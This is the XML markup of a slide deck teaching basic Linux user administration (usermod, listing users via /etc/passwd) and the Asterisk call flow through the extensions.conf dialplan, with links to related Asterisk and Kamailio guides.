          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1588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How to modify a linux user?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="474" name="Google Shape;474;p87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151525" y="2329100"/>
            <a:ext cx="8782500" cy="1111200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit fontScale="70000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4885">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usermod</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4885">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  -aG &lt;groupName&gt; &lt;userName&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5185">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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0" name="Shape 4020"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4021" name="Google Shape;4021;p654"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="3911" l="18339" r="18660" t="11421"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1110725" y="0"/>
            <a:ext cx="6803813" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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5" name="Shape 4025"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4026" name="Google Shape;4026;p655"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2585" l="18126" r="19412" t="11797"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1175450" y="0"/>
            <a:ext cx="6670507" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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0" name="Shape 4030"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4031" name="Google Shape;4031;p656">
            <a:hlinkClick r:id="rId3"/>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7089" l="14535" r="14662" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1081525" y="0"/>
            <a:ext cx="6968179" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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5" name="Shape 4035"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4036" name="Google Shape;4036;p657"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="619075"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4800" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://slideplayer.com/slide/12558458/</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4800" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://kkchaulagain.medium.com/scaling-asterisk-using-kamailio-and-rtpproxy-a-step-by-step-guide-307eddaffd5</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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0" name="Shape 4040"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4041" name="Google Shape;4041;p658"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="24752" l="9632" r="35325" t="10839"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="648350" y="316450"/>
            <a:ext cx="6732250" cy="4431175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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5" name="Shape 4045"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4046" name="Google Shape;4046;p659"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="29145" l="9311" r="35755" t="10650"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="685350" y="344225"/>
            <a:ext cx="7055899" cy="4349549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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0" name="Shape 4050"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4051" name="Google Shape;4051;p660"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="19781" l="9632" r="35325" t="20972"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500400" y="353475"/>
            <a:ext cx="7287077" cy="4412100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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5" name="Shape 4055"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4056" name="Google Shape;4056;p661"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="16718" l="9631" r="35864" t="20593"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="546650" y="295363"/>
            <a:ext cx="7037400" cy="4552775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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0" name="Shape 4060"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4061" name="Google Shape;4061;p662"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="19210" l="9632" r="35325" t="20776"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="574375" y="131525"/>
            <a:ext cx="7425802" cy="4554125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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5" name="Shape 4065"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4066" name="Google Shape;4066;p663"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="15385" l="9419" r="36721" t="20400"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="814800" y="297950"/>
            <a:ext cx="6811651" cy="456832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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1588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120">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to check list of linux users?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="480" name="Google Shape;480;p88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2030275"/>
            <a:ext cx="8520600" cy="1243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5300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat  /etc/passwd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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0" name="Shape 4070"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4071" name="Google Shape;4071;p664"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2753" l="22201" r="23726" t="1304"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2034300" y="79263"/>
            <a:ext cx="4994952" cy="4984975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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5" name="Shape 4075"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4076" name="Google Shape;4076;p665"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="740238" y="2825950"/>
            <a:ext cx="1034100" cy="3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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Call</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4077" name="Google Shape;4077;p665"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6214988" y="2749750"/>
            <a:ext cx="26274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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xtensions</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.conf</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4078" name="Google Shape;4078;p665"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1931788" y="2327400"/>
            <a:ext cx="1034100" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="D63200"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4079" name="Google Shape;4079;p665"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1954175" y="361800"/>
            <a:ext cx="50877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Call Flow </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4080" name="Google Shape;4080;p665"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3206113" y="2900200"/>
            <a:ext cx="1338000" cy="23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rgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Channel</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4081" name="Google Shape;4081;p665"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6822699" y="170275"/>
            <a:ext cx="2228449" cy="635225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4082" name="Google Shape;4082;p665"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585950" y="3710375"/>
            <a:ext cx="8258100" cy="575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1700">
                <a:solidFill>
                  <a:srgbClr val="FE6700"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Call comes in </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FE6700"/>
                </a:solidFill>
              </a:rPr>
              <a:t>on the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FE6700"/>
                </a:solidFill>
              </a:rPr>
              <a:t>channel and are then handed to the “</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FE6700"/>
                </a:solidFill>
              </a:rPr>
              <a:t>extensions</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FE6700"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.conf” file, which is the dialplan</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="FE6700"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4083" name="Google Shape;4083;p665"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="813188" y="1926324"/>
            <a:ext cx="802166" cy="802150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4084" name="Google Shape;4084;p665"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3206112" y="1814913"/>
            <a:ext cx="951291" cy="1024976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4085" name="Google Shape;4085;p665"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6814963" y="1717813"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4086" name="Google Shape;4086;p665"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4503925" y="2327425"/>
            <a:ext cx="2432400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="D63200"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4087" name="Google Shape;4087;p665"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760750" y="1097600"/>
            <a:ext cx="1034100" cy="3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rgbClr val="FE6700"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Step 1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:solidFill>
                <a:srgbClr val="FE6700"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4088" name="Google Shape;4088;p665"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8027788" y="2327400"/>
            <a:ext cx="1034100" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="D63200"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4089" name="Google Shape;4089;p665"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4318175" y="1717825"/>
            <a:ext cx="2723700" cy="3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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[contextName]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>extensionName]</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
